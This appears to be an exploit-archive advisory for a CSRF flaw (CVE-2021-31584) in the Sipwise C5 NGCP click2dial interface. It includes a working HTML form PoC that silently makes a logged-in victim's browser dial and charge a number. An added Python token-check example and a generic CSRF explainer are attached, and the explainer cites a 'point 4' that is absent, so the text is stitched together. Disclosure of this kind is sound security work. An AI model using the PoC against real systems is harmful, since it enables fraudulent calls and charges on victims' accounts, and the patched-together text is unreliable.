Sipwise's application interface allows users to perform certain actions over HTTP requests without performing a validity check to verify the request. This can be utilized to perform certain actions with administrative permissions if the logged-in user visits a malicious website. Affected versions include CE_m39.3.1 and below and NGCP www_admin version 3.6.7.
 
MD5 | e7d898fb2b62a3d6bc51dbf8df132928




Sipwise C5 NGCP CSC CSRF Click2Dial Exploit


Vendor: Sipwise GmbH
Product web page: https://www.sipwise.com
Affected version: <=CE_m39.3.1
NGCP www_admin version 3.6.7

Summary: Sipwise C5 (also known as NGCP - the Next Generation Communication Platform)
is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide
rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail,
conferencing etc.) that can be configured by end users in the self-care web interface.
For operators, it offers a web-based administrative panel that allows them to configure
subscribers, SIP peerings, billing profiles, and other entities. The administrative web
panel also shows the real-time statistics for the whole system. For tight integration
into existing infrastructures, Sipwise C5 provides a powerful REST API interface.

Desc: The application interface allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be exploited to
perform certain actions with administrative privileges if a logged-in user visits a malicious
web site.

Tested on: Apache/2.2.22 (Debian)
Apache/2.2.16 (Debian)
nginx


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2021-5649
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5649.php

CVE ID: CVE-2021-31584
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31584


13.04.2021

--


<html>
<body>
<form action="https://10.0.1.7/call/click2dial" method="POST">
<input type="hidden" name="d" value="%2B3897031337" />
<input type="submit" value="Dial and charge!" />
</form>
</body>
</html>
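As an added illustration (not Sipwise's code), the check that the click2dial handler is missing: a per-session anti-CSRF token plus an Origin/Referer test, replayed against the PoC form body above. `SITE_ORIGIN`, `issue_csrf_token` and `handle_click2dial` are assumed names for this example.

```python
# Added example, not Sipwise code: a synchronizer-token check a
# /call/click2dial handler can apply before dialling. Names are hypothetical.
import hmac
import hashlib
import secrets
from urllib.parse import parse_qs

SITE_ORIGIN = "https://10.0.1.7"          # the CSC's own origin (from the PoC)
SERVER_SECRET = secrets.token_bytes(32)    # per-deployment key, kept server-side


def issue_csrf_token(session_id: str) -> str:
    """Derive a per-session token; embed it as a hidden field in legitimate forms."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def handle_click2dial(session_id: str, headers: dict, body: str) -> tuple:
    """Return ('dial', number) only when the request is provably first-party.

    session_id: value of the session cookie the browser attached automatically.
    headers:    request headers with lower-case keys.
    body:       raw application/x-www-form-urlencoded POST body.
    """
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    number = form.get("d", "")

    # 1. Origin (or Referer) must name our own site; the PoC page posts from
    #    somewhere else, and a request carrying neither header is also refused.
    origin = headers.get("origin") or headers.get("referer", "")
    if origin != SITE_ORIGIN and not origin.startswith(SITE_ORIGIN + "/"):
        return ("rejected", "cross-origin request")

    # 2. The hidden token must match the one bound to this session. A third-party
    #    form cannot supply it, because it is never carried in a cookie.
    expected = issue_csrf_token(session_id)
    if not hmac.compare_digest(form.get("csrf_token", ""), expected):
        return ("rejected", "missing or invalid CSRF token")

    return ("dial", number)
```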
 
 

Cross Site Request Forgery 

Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploitation of a website in which unauthorized commands are transmitted from a user that the web application trusts.

Penetration Testing - Cross Site Request Forgery (CSRF)

CSRF relies on:

  1. The browser automatically sends the information used to identify the user's session. Suppose a site hosts a web application, and a victim user recently authenticated to it. In response, the site sends the victim a cookie that marks requests from the victim as belonging to the victim's authenticated session. Once the browser accepts the cookie set by the site, it automatically sends it along with every further request directed to that site.
  2. If the application does not embed session-related information in the URL, then the application's URLs, their parameters and their valid values can be identified. This can be done by code analysis or by browsing the application and recording the forms and URLs embedded in its HTML or JavaScript.
  3. "Known by browsers" refers to information such as cookies or HTTP-based authentication credentials (for example Basic Authentication rather than form-based authentication), which the browser stores and then includes in every request directed to the part of the application that requires authentication. The vulnerability discussed here applies to applications that rely entirely on this type of information to identify user sessions.

Points 1, 2, and 3 are important for presenting the vulnerability, while point 4 facilitates actual exploitation but is not entirely necessary.